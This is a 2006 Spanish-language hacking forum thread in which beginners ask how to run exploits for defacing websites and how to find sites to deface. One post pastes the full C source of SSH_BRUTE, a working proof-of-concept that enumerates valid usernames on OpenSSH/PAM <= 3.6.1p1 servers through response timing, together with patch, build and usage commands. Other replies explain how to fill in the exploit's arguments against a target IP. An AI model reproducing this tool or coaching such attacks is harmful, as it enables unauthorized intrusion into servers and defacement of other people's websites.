Vota por nosotros en el ranking web que participamos

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Octubre 13, 2008, 11:20:34
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: Ayuda con Defacing 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Ayuda con Defacing  (Leído 535 veces)
xXx R4z0R xXx
Miembro
*****
Desconectado Desconectado

Mensajes: 56


PoLiCe SwAt


Ver Perfil
« en: ſeptiembre 13, 2006, 02:20:25 »

bueno estoy empezando con el defacing ya se como scannear la web, conseguir los exploit y copilarlos pero mi duda es ya cuando tengo el Exploit en .exe como hago para lanzar el Exploit??? Huh

>>Saludos<<
En línea

ManCuerTex
Visitante
« Respuesta #1 en: ſeptiembre 13, 2006, 10:30:54 »

En línea
OzX
Moderación
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2100


www.nullbytes.net


Ver Perfil WWW
« Respuesta #2 en: ſeptiembre 13, 2006, 02:54:52 »

donde mismo lo compilaste o si lo interpretaste en el caso de perl
lo ejecutas...

aveces es necesario ejecutar el programa en
c:\cygwin\bin> a.exe
siendo a el resultado del exploit

por si lo compilaste en cygwin...

Manual de perl

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
http://foro.el-hacker.com/index.php/topic,63960.0.html


Manual de C cygwin

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
http://foro.el-hacker.com/index.php/topic,63749.0.html
En línea


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.NULLBYTES.Net
xXx R4z0R xXx
Miembro
*****
Desconectado Desconectado

Mensajes: 56


PoLiCe SwAt


Ver Perfil
« Respuesta #3 en: ſeptiembre 14, 2006, 12:24:34 »

bueno ya me ido a CMD y ejecute el exploit y me aparece lo siguiente



y aqui tambien esta el codigo del exploit


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

>>Saludos<<
« Última modificación: ſeptiembre 14, 2006, 12:29:29 por xXx R4z0R xXx » En línea

anonimox
Visitante
« Respuesta #4 en: ſeptiembre 14, 2006, 07:02:13 »

tns que tipear esto ahora

exploit.exe protocol version user file host

reemplaza protocol version x la version de algun protocol q estas queriendo hackear

user file , por algun archivo que te pide.

y host por la ip del servidor


salu2
En línea
xXx R4z0R xXx
Miembro
*****
Desconectado Desconectado

Mensajes: 56


PoLiCe SwAt


Ver Perfil
« Respuesta #5 en: ſeptiembre 14, 2006, 03:05:52 »

todavia con duda??  Huh  Huh    Huh
En línea

anonimox
Visitante
« Respuesta #6 en: ſeptiembre 14, 2006, 06:19:02 »

todavia con duda??  Huh  Huh    Huh

cual es la duda?  pone el codigo del exploit aqui

salu2
En línea
zickox
Visitante
« Respuesta #7 en: ſeptiembre 14, 2006, 08:22:15 »

si no entiendes lo demas... tendras ke estudiar mas... ya lo tienes todo...  solo te falta komprender lo otro ke es lo mas simple... son solo datos del sistema vuln y conceptos comunes en informatica


salu2
« Última modificación: ſeptiembre 14, 2006, 08:22:47 por zickox » En línea
xXx R4z0R xXx
Miembro
*****
Desconectado Desconectado

Mensajes: 56


PoLiCe SwAt


Ver Perfil
« Respuesta #8 en: ſeptiembre 14, 2006, 09:10:36 »

todavia con duda??  Huh  Huh    Huh

cual es la duda?  pone el codigo del exploit aqui

salu2

aka esta el codigo del exploit

/*
 * SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool
 * Copyright (c) 2003   @ Mediaservice.net Srl. All rights reserved
 *
 * THIS IS PROPRIETARY SOURCE CODE OF   @MEDIASERVICE.NET, DO NOT DISTRIBUTE.
 *
 * Vulnerability discovered by Marco Ivaldi <raptor  @mediaservice.net>
 * Proof of concept code by Maurizio Agazzini <inode  @mediaservice.net>
 *
 * Tested against Red Hat, Mandrake, and Debian GNU/Linux.
 *
 * Reference:
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
 *
 * $ tar xvfz openssh-3.6.1p1.tar.gz
 * $ patch -p0 <openssh-3.6.1p1_brute.diff
 * patching file openssh-3.6.1p1/ssh.c
 * patching file openssh-3.6.1p1/sshconnect.c
 * patching file openssh-3.6.1p1/sshconnect1.c
 * patching file openssh-3.6.1p1/sshconnect2.c
 * $ cd openssh-3.6.1p1
 * $ ./configure
 * $ make
 * $ cc ../ssh_brute.c -o ssh_brute
 * $ ./ssh_brute 1 list.txt 192.168.0.66
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>

/* an illegal user */
#define NO_USER "not_val_user"

/* path of the patched ssh */
#define PATH_SSH "./ssh"

/* max time range for invalid user */
#define TIME_RANGE 3

int main(int argc, char *argv[])
{
   FILE * in;
   char buffer[2000], username[100], *host;
   int time_non_valid = 0, time_user = 0;   
   int version = 1, i = 0, ret;

   fprintf(stderr, "\n SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool\n");
   fprintf(stderr, " Copyright (c) 2003   @ Mediaservice.net Srl. All rights reserved\n");

   if (argc < 3) {
      fprintf(stderr, "\n Usage: %s <protocol version> <user file> <host>\n\n", argv[0]);
      exit(-1);
   }

        version = atoi(argv[1]);
        host = argv[3];

   if ( ( in = fopen(argv[2], "r") ) == NULL ) {
      fprintf(stderr, "\n Can't open %s\n", argv[2]);
      exit(-1);
   }

   /* test an illegal user */
   printf("\n Testing an illegal user\t: ");
   fflush(stdout);
   
   sprintf(buffer, "%s -%d %s  @%s", PATH_SSH, version, NO_USER, host);

   for (i = 0; i < 3; i++) {
      ret = system(buffer);
      time_non_valid += WEXITSTATUS(ret);
   }

   time_non_valid /= 3;

   printf("%d second(s)\n\n", time_non_valid);

   time_non_valid += TIME_RANGE;

   /* test supplied users */
    fscanf(in, "%s", username);

   while ( !feof(in) ) {
      
      printf(" Testing login %s\t", username);

      if (strlen(username) <= 8 ) 
         printf("\t");
      printf(": ");

      fflush( stdout );

      sprintf(buffer, "%s -%d %s  @%s", PATH_SSH, version, username, host);
      ret = system(buffer);
      time_user = WEXITSTATUS(ret);

      if (time_user <= time_non_valid)
         printf("\E[31m\E[1mILLEGAL\E[m\t[%d second(s)]\n", time_user);
      else {
         /* valid user? test it again to be sure */

         ret = system(buffer);
         time_user = WEXITSTATUS(ret);

         if (time_user <= time_non_valid)
                          printf("\E[31m\E[1mILLEGAL\E[m\t[%d second(s)] [2 test]\n", time_user);
         else
            printf("\E[32m\E[1mUSER OK\E[m\t[%d second(s)]\n", time_user);
      }

      fscanf(in, "%s", username);
   }
   
   fclose(in);
   
   printf("\n");

   exit(0);
}
« Última modificación: ſeptiembre 14, 2006, 09:17:49 por xXx R4z0R xXx » En línea

ATG-11
Miembro
*****
Desconectado Desconectado

Mensajes: 66



Ver Perfil
« Respuesta #9 en: Noviembre 02, 2006, 02:11:48 »

hola, una cosa, ejecuto el exploit en msdos, y me sale lo siguiente:



Que tengo que hacer???

Gracias
En línea

by ret



PowaZor(Ele)
Miembro
*****
Desconectado Desconectado

Mensajes: 110



Ver Perfil
« Respuesta #10 en: Noviembre 02, 2006, 10:20:40 »

le hiciste un Dos..(creo Tongue),.. cuando sale q se perdio la connex, quiere decir q botaste la pag o te blokearon el ip
En línea
darthblacky
Visitante
« Respuesta #11 en: Noviembre 02, 2006, 11:25:24 »

En línea
ATG-11
Miembro
*****
Desconectado Desconectado

Mensajes: 66



Ver Perfil
« Respuesta #12 en: Noviembre 02, 2006, 11:59:43 »

otra pregunta:
de donde sacais tantas webs pa defacear?
en que os basais pa buscar?

Gracias
En línea

by ret



Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: Ayuda con Defacing « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.6 | SMF © 2006-2007, Simple Machines LLC